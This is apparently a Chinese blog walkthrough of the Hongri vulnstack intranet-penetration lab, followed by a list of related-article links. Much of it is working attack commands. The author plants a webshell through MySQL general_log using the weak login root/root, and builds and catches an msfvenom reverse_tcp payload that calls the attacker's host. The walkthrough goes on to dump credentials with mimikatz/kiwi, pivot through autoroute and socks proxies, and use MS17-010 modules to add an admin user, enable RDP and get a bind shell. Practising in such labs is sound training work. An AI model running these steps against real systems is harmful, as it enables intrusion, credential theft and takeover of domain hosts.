内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板
靶场下载:漏洞详情
环境搭建:
文件下载下来有三个压缩包,分别对应域中三台主机:
VM1对应win7是web服务器
VM2对应windows2003是域成员
VM3对应windows server 2008是域控
解压后双击文件夹中的,vmx文件即可一键创建虚拟机,登录密码都是hongrisec@2019,2003和2009输入密码后会强制要求改密码
网络配置
win7网络适配器为自定义(VMnet1仅主机模式),再添加一个网络适配器设置为NAT模式;
windows2004,windows2008网络适配器设置为自定义(VMnet1仅主机模式)
攻击机kali设置为NAT模式
此时win7,windows2003,windows server 2008处于同一内网中,攻击机kali只能先拿下win7,在通过win7访问内网进行横向渗透
kali:192.168.106.128
windows 2008:192.168.52.138
windows 7 内网地址: 外网地址:192.168.106.130
windows 2003:192.168.52.141
开启win7中的phpstudy;
外网渗透|信息收集
nmap扫一下,找到win7的ip地址192.168.106.130
继续扫一下win7开放了哪些端口
访问80端口,是一个php探针页面
扫描网站的目录 发现了phpmyadmin
访问phpMyadmin 通弱口令root/root访问到网站的后台
这个时候我们已经想一些思路比如getshell.可以使用mysql上传一句话木马
发现报错了,尝试phpinfo看看
phpinfo因为服务器使用--secure file priv选项运行所以也无法执行语句
试试看能不能通过日志文件来写shell,执行show variables like '%general%';查看一下日志
发现执行成功,我们发现日志功能是关闭的general_log OFF我们可以通过打开日志功能开启后.我们执行过的sql语句都会保存到 C\:phpstudy\mysql\data\stu1.log,我们可以修改保存路径,存到我们指定的文件中
首先我们开启日志功能set global general_log =on;
我们需要把日志文件放到我们可以查看的地方所以我们应该更换日志文件位置到/phpstudy/WWW/shell.php
输入参数set global general_log_file='C:\phpStudy\WWW\shell.php'
这个时候这个日志文件我们尝试是否可以访问
是可以访问的 所以我们执行应一个一句话木马然后尝试连接
访问日志shell.php页面
使用菜刀连接 通过菜刀虚拟终端我们使用命令whoami发现我们是administrators[管理员用户]
内网渗透
查看本服务器的内网ip地址使用ipconfig
本机的内网ip地址为192.168.52.143
使用net config workstation查看当前计算机名称,全名,用户名,以及所在工作站域的名称
该服务器计算机名:\\STU1
计算机全名:stul.god.org
用户名:administrator
工作站域:GOD
工作站域DNS名称:god.org
登录域:GOD
使用net user查询有多少用户
发现有三个用户 查看liukaifeng01是否为管理员用户 使用 net localgroup administrators
发现liukaifeng01也是管理员用户
使用systeminfo查看系统信息,可以确定当前域为god.org,域服务器名称为OWA,并且还打了四个补丁
反弹shell
在kali中我们找到webshell
编辑php-reverse-shell.php 将ip设置为kali的ip地址
打开我们kali的http服务 输入 python SimpleHTTPServer
开启我们的nc监听 因为webshell里面设置的端口是4444 所以我们nc应该监听4444端口 输入参数nc -lvvvp 4444
发现菜刀可以自动让我们上传文件
上传了文件后我们访问此文件
发现nc也连接失败
可能是自己的技术问题,于是我们使用msf渗透框架中的反弹shell,通过msf生成一个木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.106.128 LPORT=6666 -f exe -o shell.exe
我们将shell.exe保存下来
在kali使用msf监听[后期渗透方便] 使用exploit/multi/handler模块进行监听
use exploit/multi/handler
设置自己的参数
set LHOST 192.168.106.128 最后run即可
set LPORT 6666
设置一个payload
set payload windows/meterpreter/reverse_tcp
将shell.exe上传到了靶机
运行shell.exe
MSF监听模块有了回显
使用getuid查看当前用户
使用getsystem升级到system权限
打开3389服务 msf使用run getgui -e
使用meterpreter中mimikatz模块获取密码load mimikatz加载;
The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
Loading extension kiwi...这句话大概意思就是说mimikatz已经被kiwi替换
Mimikatz使用
cls: 清屏
standard: 标准模块,基本命令
crypto: 加密相关模块
sekurlsa: 与证书相关的模块
kerberos: kerberos模块
privilege: 提权相关模块
process: 进程相关模块
service: 服务相关模块
lsadump: LsaDump模块
ts: 终端服务器模块
event: 事件模块
misc: 杂项模块
token: 令牌模块
vault: 令牌操作模块
minesweepre:Mine Sweeper模块
dpapi: DPAPI模块(通过API或RAW访问)[数据保护应用程序编程接口]
busyloght: BusyLight Module
sysenv: 系统环境值模块
sid: 安全标识符模块
iis: IIS XML配置模块
rpc: mimikatz的RPC控制
sr98: RDM(830AL)器件的射频模块
acr: ACR模块
version: 查看版本
exit: 推出
creds_msv: 获取密码hash值
creds_kerberos: 获取密码明文使用creds_msv获取密码hash 和 creds_kerberos 获取密码明文
内网渗透
arp -a查看路由表
发现还存在两个主机192.168.52.138和192.168.52.141
添加路由为了访问52网段的主机
run autoroute -s 192.168.52.0/24添加路由
run autoroute -p 查看路由
MSF跳板功能
NSF的跳板功能,MSF框架中自带的一个路由转发功能,实现过程就是MSF框架在已经获取的meterpreter shell的基础上添加一条去往"内网"的路由,直接使用msf去访问原本不能直接访问的内网资源,只要路由可达了那么我们就可以使用msf的强大功能
获取目标内网相关信息
run get_local_subnets
获取被攻击目标内网地址网段 /添加去往目标网段的转发路由
run autoroute -s 192.168.52.0/24
扫描有效网卡的整个C段信息 / 查看路由添加情况
run autoroute -p
查看域环境
use incognito
调用劫持域管理模块
list_token -u
内网通道构建--MSF socks
MSF自带内网通道auxiliary/server/socks4a与auxiliary/server/socks5代理模块,当拿到一个msf shell时,即可使用代理模块进行横向操作
原理:Kali攻击机已经拿到Target1的msf shell,需要通过Target1构建通道,访问Target2主机,在Target2中,配置由Apache服务,浏览器访问Yeah,You can access it!
Socks4a代理
实际上还由很多模块
auxiliary/server/socls4a
auxiliary/server/socls5
auxiliary/serversocks_proxy
auxiliary/server/socks_sunc
添加:run autoroute -s 192.1.1.0/24 #添加路由run autoroute -p #查看路由 默认添加run post/multi/manage/autoroute添加了路由后设置参数
use auxiliary/server/socks4a show optinos //详细设置信息 set srvport 117 //设置代理端口 run
首先把session会话放在后台background
设置代理,方便访问内网服务;
use auxiliary/server/socks_proxy
set SRVHOST 攻击机ip地址 //注意:要是执行不成功端口被占用换一个端口就好
修改kali的/etc/proxychains.conf
ProxyChains.conf
ProxyChains是Linux和其他Unices下的代理工具,它可以使任何程序通过代理上网,允许TCP和DNS通过代理隧道,支持HTTP,SOCKS4和SOCKS5类型的代理服务器,并且可配置多个代理,ProxyChains通过一个用户定于的代理列表强制连接指定的应用程序,直接断开接受方和发送方的连接
socks4 127.0.0.1 1080 1080//添加msf监听的代理
由于是双网卡,设置下能不能curl访问内网ip
proxychains curl http://192.168.52.143
可以访问成功,接下来扫一下另外两台主机开启了哪些端口,使用auxiliary/scanner/portscan/tcp
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.138
set thread 100
run
最后发现两台主机都存在445 135SMB服务D
检测是否存在永恒之蓝
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.52.138
检测出存在永恒之蓝漏洞,不用多说直接上ms
首先想到exploit/windows/smb/ms17_010_eternalblue
发现最后执行失败 尝试使用auxiliary/admin/smb/ms17_010_command模块执行命令
use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.138
set command whoami
run发现可以执行命令
使用ms17_010_command执行一下命令
set command net user lyq djxlyq63 /add
#添加用户
set command net localgroup administrators lyq /add
#添加管理员权限
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
#执行命令开启3389端口,这里要么用单引号把命令引住,要么用反斜杠对反斜杠和引号进行转义,不然会出错proxychains rdesktop 192.168.52.138
远程桌面连接成功,可以用添加的用户进行登录
使用exploit/windows/smb/ms17_010_psexec
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
//正向代理直接连接拿shell
因为内网的机器没有代理,只能我们通过代理去连接靶机 攻击机--->代理---->靶机 因为靶场没有代理,不能反向连接我们
正向监听:靶机监听,我们去连接靶机
反向监听:我们监听,靶机来连接我们
set rhosts 192.168.52.138
run
然后使用getsystem进行提权,这样域成员的system就拿到了
总结
从web服务器到phpmyadmin mysql的规则show variables like '%general(mysql查询日志)%' PHPmyadmin弱口令root/root mimikatz creds_msv mreds_kerberos 查看路由表arp -a发现网段然后run autoroute -s 网段录入路由 查看路由 run autoroute -p 设置代理连接socks4a socks_proxy等 修改proxychains 第一次渗透内网 所以做一次笔记分享给大家
内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板相关推荐
- 内网安全:Cobalt Strike 工具 渗透多层内网主机.(正向 || 反向)
内网安全:Cobalt Strike 工具 渗透多层内网主机. Cobalt Strike 是一款以 metasploit 为基础的 GUI 的框架式渗透工具,又被业界人称为 CS.拥有多种协议主机上 ...
- 小白渗透0-1:BlackMarket靶场渗透记录
小白渗透0-1:BlackMarket靶场渗透记录 #环境 攻击机:kali 192.168.200.129 靶 机:BlackMarket 链接:https://pan.baidu.com/s/1S ...
- 内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)
内网安全:内网渗透.(拿到内网主机最高权限) 内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题.通过映射端口,让外网的电脑找到处于内 ...
- 内网渗透之CFS三层靶场渗透
环境搭建 网卡设置 kali为攻击机:192.168.3.57(桥接模式) Target1:192.168.3.120(桥接模式),192.168.22.128(仅主机模式Vmnet2) Target ...
- 内网渗透建立代理通道(如何攻击目标内网机器?)-Socks代理(゚益゚メ) 渗透测试
文章目录 搭建靶场 配置虚拟机网络 虚拟机 上线目标1(Target1) Socks代理 简介 正向代理 反向代理 FRP 一层代理 二层代理(多层代理) EW 正向代理 反向代理 二层代理流量转发 ...
- 红队攻防知识分享-红日安全团队靶场1
环境搭建 靶场链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 环境拓扑图: 以下是虚拟机网络配置 虚拟机 网络配置 Windows7 x64 ...
- 阿里内网精选:Java微服务实战笔记,共140个案例
微服务是当下所有互联网项目的首选架构,已经成为高级Java程序员必备技能. 然而,目前网络中的微服务课程主要围绕SpringCloud相关技术栈,微服务不仅仅是SpringCloud,还包括很多分布式 ...
- 阿里内网最新发布“M8”级Java面试笔记,助力金九银十
眼下虽然才6月份,但真正的金九银十已经悄然开始.从认识的HR那得知,有些公司甚至在过年前就开始布局了..而年前偃旗息鼓的,年后也势必加速进入这波抢人大战! 附面试思维导图: 因此,真的要等到9.10月 ...
- 提个醒。阿里内网最新发布“M8”级Java面试笔记,助力金三银四
真正的金三银四已经悄然开始.从认识的HR那得知,有些公司甚至在过年前就开始布局了..而年前偃旗息鼓的,年后也势必加速进入这波抢人大战! 因此,真的要等到3.4月份再做准备的话,就晚了. 这不最近,就有 ...
最新文章
- Jupyter Notebook各种使用方法
- Java 8 CompletableFuture
- 最难面试IT公司的测试题
- .NET6发布了Preview2,这点超越过去10年!
- NYOJ 1009 So Easy[Ⅰ]【简单题】
- 跟我学《JavaScript高程3》第一讲,视频课程,课程笔记
- 关于 win7 远程桌面的多用户问题
- 浪潮商用房树新:云数据库时代来临,看浪潮商用机器如何以Power系列夯实云之基石...
- Go语言基础(一)——HelloWorld
- 快速学会php视频,PHP视频从入门到精通---适合PHP初学者
- 向上累积频数怎么算_视频号怎么运营?小白也能迅速get的技巧
- html里面怎么引别的页面_如何在一个html文件中引入另一个html文件?
- 一台计算查找另一台计算机,将SSH密钥从一台计算机移动到另一台计算机 | MOS86...
- 局域网共享工具_win10一键共享工具免费版(快速解决局域网文件共享问题)官方版...
- CorelDRAW 12快捷键
- 程序阅读_全面详解LTE:MATLAB建模仿真与实现_自学笔记(1)调制与编码_程序阅读
- [转]电子产品将标环保使用期限
- java面试题-需要背的内容
- 进大厂必备的Java八股文大全(2022最强精简易懂版)
- python绘制动态图形_让Python绘制一套动态图形给你看看